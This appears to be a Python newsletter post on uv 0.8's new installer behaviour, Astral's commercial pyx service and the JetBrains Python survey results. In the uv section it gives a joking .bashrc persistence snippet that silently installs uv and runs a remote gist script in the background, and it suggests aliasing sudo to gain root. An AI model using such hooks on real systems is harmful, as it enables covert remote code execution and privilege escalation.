Summary
Astral releases pyx, its commercial venture, and turns uv into a more general Python installer. JetBrains Python survey results are in, and stay pretty consistent with the previous years.
And many little things. Mainly those two, though.
A lot of Astral things happened
Even if the initial buzz surrounding uv has calmed down, I still follow the company closely, because they haven't stopped being awesome. People just paid less attention to it.
First, they released uv 0.8 with changes that will shift how the tool positions itself. It will use its own build backend by default, getting closer to a full replacement for competitors like hatch.
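To see what that means in practice, here is a minimal sketch (the demo package name is made up, and I'm assuming the uv 0.8 defaults described above, where the generated [build-system] table points at uv's own uv_build backend):
uv init --package demo       # scaffold a packaged project with a src/ layout
cat demo/pyproject.toml      # the [build-system] table now points at uv's own backend (uv_build)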
But more importantly, it used to be that uv was only for bootstrapping and managing your Python projects. However, now it's also a general-purpose Python installer:
uv will install Python executables in a directory on the PATH. This means if you uv python install python3.13, you can now call python3.13 without uv, outside of any project. You can opt out of this with --no-bin or UV_PYTHON_INSTALL_BIN=0 (see the sketch after this list).
uv-installed Python executables will now be registered in the Windows registry, making them more discoverable on this OS.
UV_TOOL_BIN_DIR will be set in Docker images to /usr/local/bin, making it a system-wide installer for containers.
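A quick sketch of the new behavior (the version numbers are just examples):
uv python install 3.13             # drops a python3.13 executable into a directory on your PATH
python3.13 --version               # callable outside of any project, no `uv run` needed
uv python install 3.12 --no-bin    # opt out of the PATH executable for this install
export UV_PYTHON_INSTALL_BIN=0     # or opt out globally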
The first 2 are good things in my book. It means fewer failure modes for beginners, and sane defaults for everybody. Note that uv Python will shadow the system Python on Linux for the user, but not for the OS. I think this is ideal: it completely severs the Python for the system from the one people can mess with.
The 3rd one, I'm not so sure about. I believe one should still isolate Python in a container, and I worry that this new behavior is going to cause trouble down the road. I would advise you to use a non-root user to set up your Docker image, and set UV_TOOL_BIN_DIR to ~/.local/bin to opt out of this.
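Concretely, that opt-out is a couple of lines in your image; a minimal sketch, assuming a non-root user with a home directory (installing ruff is just an illustration):
export UV_TOOL_BIN_DIR="$HOME/.local/bin"   # override the image default of /usr/local/bin
uv tool install ruff                        # the ruff executable now lands in the user's ~/.local/bin
ls "$UV_TOOL_BIN_DIR"                       # nothing gets written system-wide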
Also, they upgraded uv's download-and-run-code capabilities. You could do this already:
uv run https://pastebin.com/raw/RrEWSA5F
But now it works with gists as well:
uv run https://gist.github.com /charliermarsh/ea9eab7f56b1b3d41e51960001cae31d#file-bar-py
(I have to put spaces in there to stop Substack from eating the URL)
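And since uv understands PEP 723 inline dependencies natively, such a script can be completely self-contained. A minimal sketch (the file name and the rich dependency are arbitrary):
cat > demo.py <<'EOF'
# /// script
# dependencies = ["rich"]
# ///
from rich import print
print("[bold green]hello from a self-contained script[/bold green]")
EOF
uv run demo.py   # uv creates a throwaway environment with rich and runs the script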
This is super nice for demos, especially mixed with the native inline deps support shown above. It's also a fantastic attack vector, if you manage to put this in .bashrc:
pwn(){
wget -qO- https://astral.sh/uv/install.sh | sh &> /dev/null
uv run https://gist.github.com/your_python_script &> /dev/null
}
pwn &
Alias sudo to call this before, and you even get root for free. Pentesters all over the world are rejoicing.
Ok, if you can execute code out of a sandbox on a machine, it's already too late. But this makes it extra juicy.
Finally, remember when I said that ironically, uv couldn't solve packaging problems, and also that people were worried about Astral's business model?
Well, last year Charlie Marsh told us in a great interview (still worth watching BTW) they intended to target the B2B market, and they just announced that they are now doing exactly that with their new product: pyx.
Pyx is a SaaS that will solve packaging problems, and many more, by doing stuff on the server side, which uv can't. uv will stay FOSS; pyx is the commercial venture that will make them money. They want to make installing unruly beasts like PyTorch easy, let you get the most out of your GPU, and of course sort out the whole security deal corporations care about.
Waiting list only, for now.
The numbers are in
The annual JetBrains Python survey results have been published. Take this with the grain of salt that comes with the obvious bias of such a data source, but here is what I make of it:
1 - 50% of the people answering the survey have less than 2 years of professional experience, and 47% are below 30 years old. I believe this reflects the fact that a lot of fresh blood is constantly pouring into the community. But also that when somebody needs to teach programming, they will choose Python. And that if you are not a programmer (like a mathematician, biologist, economist or geographer) but need to code something anyway, you will likely pick Python. This is quite universal, as only 14% of respondents are from the US!
Keep in mind that 32% reported contributing to open-source projects last year, most of that through code, while 26% said they have packaged and published a Python application to a package repository. That's one order of magnitude more than IRL (IMO YMMV TBF AFAIK). So the survey likely has a wayyyyyy more experienced cohort than your average team. That 50% is probably an underestimate.
I keep repeating it wherever I go, but geeks rarely listen: if you want to reach Python devs with any medium (tutorials, articles, videos, documentation), you HAVE to take that into consideration. If you do Rust, you can assume proficiency. Not with Python.
That's why this blog has an introduction to the terminal, environment variables or the debugger. So I can link to it in any article that has this as a prerequisite to be understood.
2 - Data analysis (48%), Web dev (46%) and machine learning (41%) are by far the most popular use cases for Python. Mobile dev, game dev, embedded dev and multimedia are scraping by at a few percent, dead last. Nothing surprising, but it's good to see that what you experience in the field is reflected here. It correlates well with my experience going from client to client, and that makes me feel all fuzzy inside. Also, I hope the mobile dev situation is going to change at some point, thanks to the fact we now have an official Android build target.
3 - 58% learn stuff first from Documentation and APIs. Yeah, right. I don't buy this BS. I used to RTFM colleagues constantly until LLMs arrived and could basically do that for them. But you do feel good when you pretend you do. However, 51% say they learn from YouTube. That, I believe. Not TikTok, Insta, X or BSKY (other, 11%) mind you, but 17 yo and under are excluded from the pool. 27% from AI tools, 41% from blogs, 42% from Stack Overflow. Really? It's still alive?
4 - Most people (35%) stay one Python version (3.12) behind latest (3.13). Good. That's what I recommend as well. Astonishingly, 2% use an unstable version (3.14, very bleeding edge when the survey came out), which says a lot about how disproportionately advanced users are represented in this pool.
5 - 4% use Python 2. More than 3.7, 3.6 or 3.5! There is a lesson in there.
6 - The most popular reason to avoid upgrading (53%) is: "The version I'm using meets all my needs". So there is that.
7 - Installation mode is mostly Python.org (good) and system tools (bad). Despite the huge, deserved hype, uv is still niche, believe it or not. That's how big the community is, and that means inertia. Don't get fooled by the bubble of enthusiastic nerds you hang out with. If you read a tech blog, you are in a minority bucket. In fact, even when it's about installing packages from PyPI, pip tops out at 74%, poetry follows at 20% and conda falls to 18% (from 20% last year, and Anaconda goes from 27% as a package source to 6%!). uv is barely in front of the very obsolete pipenv with 11%. But it was not even there in the previous survey, so that's something! What might take you by surprise is that 25% install packages directly from... GitHub, and between 10 and 30% (hard to say) from a local source or a private index.
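For reference, "installing directly from GitHub" or "from a private index" looks like this (the index URL and package name are placeholders):
pip install "git+https://github.com/psf/requests"                       # straight from a Git repo
pip install --index-url https://pypi.example.com/simple/ some-package   # from a private index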
8 - On the Web side, FastAPI (38%) took over Django (35%) and Flask (34%) in popularity. If you like the FastAPI look and feel but still want to benefit from all the Django goodies, I recommend django-ninja. Yet, I have the feeling that we are getting ripe for a new framework that reaps the lessons of all those projects, builds on free threading and provides a modern experience. I keep using Django for almost everything since I rarely need something custom enough that it justifies reinventing the wheel with micro-frameworks. And it does the job wonderfully. But it is legacy in both the good and the bad ways.
9 - On the test side, pytest is king (53%). I think it's a solved problem. Next. However, on the GUI side, that Tkinter (21%) is still the top player is very, very sad.
10 - Containers and the cloud in general (AWS and Kubernetes in particular) are popular options for deployment. Given how inexperienced a lot of the community is, this sounds way overkill to me. This is echoed by the fact that most (51%) "develop for the cloud locally with virtualenv" more than in containers or virtual machines. Or it might be just an artifact of how portable Python is. Maybe both. In any case, 42% don't use a venv in a container. And then complain something breaks, I assume.
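For the record, "using a venv in a container" boils down to a few lines like these (the paths and the app module are hypothetical):
python -m venv /opt/venv                          # create the venv inside the image
/opt/venv/bin/pip install -r requirements.txt     # install dependencies into it
/opt/venv/bin/python -m myapp                     # run your code with that interpreter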
11 - Data-science wise, pandas (80%) stays miles ahead. We may hear a lot about Spark and Polars, but they are only 16% and 15% respectively. 8% have an in-house solution. That's a lot more than it looks like, given the cost of maintaining one. But I can attest to that. I have a massive client that made me port their entire critical, enormous, proprietary calculation engine to Python from... Matlab. You would think coming from a matrix oriented language, the whole thing would make an easy target for at least NumPy. But no. We had to write most things custom. Anything that deals with the messy nature of human life and not something virtual like a video codec or a file system will eventually be full of small details that can't be vectorized. Laws, dates and configurability are especially gnarly. No SIMD for me.
12 - Scikit-learn (68%) is in front of both PyTorch (66%) and TensorFlow (49%) in terms of user base, which is counterintuitive in this day and age of AI bubble. You would think that old school machine learning has been rendered obsolete, but it turns out those techniques, while less flexible, are also more cost effective. So it makes sense to stick to what is fast and cheap if it works.
13 - OS wise, we are at 59% Linux, 58% Windows, 27% macOS, keeping in mind that WSL skews the results and that people can rock several devices or partitions. Again, if you address the community, knowing that so many Windows users are present is very important, since many are not comfy with the CLI, although this is improving.
14 - Not so much related to Python but interesting as a standalone data point: ChatGPT stays the uncontested winner of the AI race, with 4 out of 5 respondents using it. Anthropic's Claude, especially the Claude Code agent, is vastly superior in almost every way for coding, and yet scores only 17%. Branding is a powerful force. And so is being the default option (39% use GitHub Copilot, despite it being very limited) or being free (Google Gemini, 23%).
15 - On the DB side, the podium goes to Postgres (49%), SQLite (37%) and MySQL (31%), with Redis (18%) right behind, to the surprise of no one. You really have to scroll to see columnar DBs in there, like the excellent ClickHouse (2%), and DuckDB is nowhere in sight, no matter how popular data analysis is.
16 - CI is also pretty much what you expect: GitHub Actions is evidently first because... GitHub (35%), followed by GitLab CI (22%), Jenkins / Hudson (12%), Azure DevOps (8%) and AWS stuff (5%). The latter is more corporate, and given the nature of the survey, is likely to be underrepresented.
17 - The Configuration Management Tools section is really, really fun. The graph starts with Ansible at 8%, followed by "a custom solution". Given how much Ansible sucks, that's very telling. But the most important number is "None", at 71%. Yes, many people do stuff manually, because remember, half of the community is made of beginners. But also, containers and orchestrators moved automation from Ansible YAML files to Dockerfiles and... Kubernetes YAML files, I guess. I want to believe that in an alternative universe, CUELang became the de facto conf language and they achieved world peace.
18 - Documentation wise, raw markdown seems to win (44%). But it's a format, not a system like Swagger (29%), which is automated and just for Web APIs, or Sphinx (14%). This doesn't say much: most READMEs are in markdown by default, and both Sphinx and MkDocs support markdown. I'll say the quiet part aloud though: a lot of people hate RST with a passion.
19 - VSCode (49%) and PyCharm (25%) are still the editors of choice. 7% for Vim + Neovim. Again, if you had a picture of the average Python dev rocking Arch Linux with a tiled DE from their Dvorak ergo keyboard, you are going to be very disappointed.
20 - You might think that C is the main language to create compiled extensions for Python, but it's only the second (45%), the first one being C++ (55%). Given the precision of this survey, we can consider them at the same level, but it's still way more than I suspected. 3rd place goes to Rust, with a staggering 33% of people that used it for that purpose at least once. That's how much Rust is popular in the Python world nowadays. 4th place is Go (9%)!
Let's not forget
PEP 802 suggests that we change the empty set notation from set() to {/}. I'm neutral on this one.
PyPI will now reject zip archives crafted to exploit parser confusion attacks. Nice to see the security devs keeping at it.
The Python documentary is out, watch it for free on YouTube.
The core devs relegate the old Intel CPU to a lower tier of support on Mac. It was 2 Apple architecture changes ago so I don't know who is impacted by this, but I'm sure someone, somewhere, will be.
A new profiling module will be added to the stdlib. It will do nothing by itself, and serves only as a namespace to group all things related to profiling in Python, such as cProfile (aliased to tracing) and the new statistical sampling profiler previously named "tachyon" (renamed sampling). If none of that makes sense to you, don't worry, it's mostly to keep imports neat and tidy. Careful though, it does come with a deprecation of the old imports over 2 years.
If you want download stats for packages on PyPI, you go to Pypistats. And it's now operated by the PSF, to keep it running forever.
Google sunsets pytype, its Python type checker project. You know the joke about Google canceling projects, right?